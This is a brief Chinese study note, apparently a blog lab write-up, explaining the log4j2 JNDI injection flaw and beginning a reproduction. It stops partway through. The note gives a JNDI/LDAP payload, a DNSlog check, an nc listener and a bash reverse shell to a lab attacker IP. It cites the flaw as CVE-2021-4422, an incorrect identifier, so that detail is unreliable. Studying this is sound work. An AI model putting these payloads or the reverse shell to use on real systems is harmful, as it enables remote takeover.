最近一直在搞蓝队所以懈怠了更新,主要还是懒得搬笔记
CVE-2021-4422
漏洞原理:log4j2组件在处理程序日志记录时存在JNDI注入缺陷
详解:
在该框架下的lookup查询服务提供了{}字段解析,故payload为${jndi:ldap:恶意url},JNDI会去对对应的服务(如:LDAP、DNS等)查找资源,本例调用LDAP服务,<font color="#f79646">由于对lookup的出栈无限制</font>,导致最终指向攻击者站点,下载远程恶意class文件,最终导致远程rce。
漏洞价值:任意RCE
漏洞利用:LDAP(目录访问协议),RMI(分布式对象应用)
PS:JNDI(java命名和目录接口)用于目录管理,通过名称调用接口
漏洞复现
靶机:192.168.245.1xx
攻击机:192.168.245.1oo
1.DNSlog验证漏洞
payload=\${jndi:ldap\://\${sys:java.version}.DNS地址}
2.攻击机监听端口 7777
nc -lvvp 7777
3.将bash反弹shell命令编码 base64
<font color="#f79646">bash -i >& /dev/tcp/192.168.245.1oo/7777 0>&1</font>
解释:
- bash:启动bash shell
- -i:开启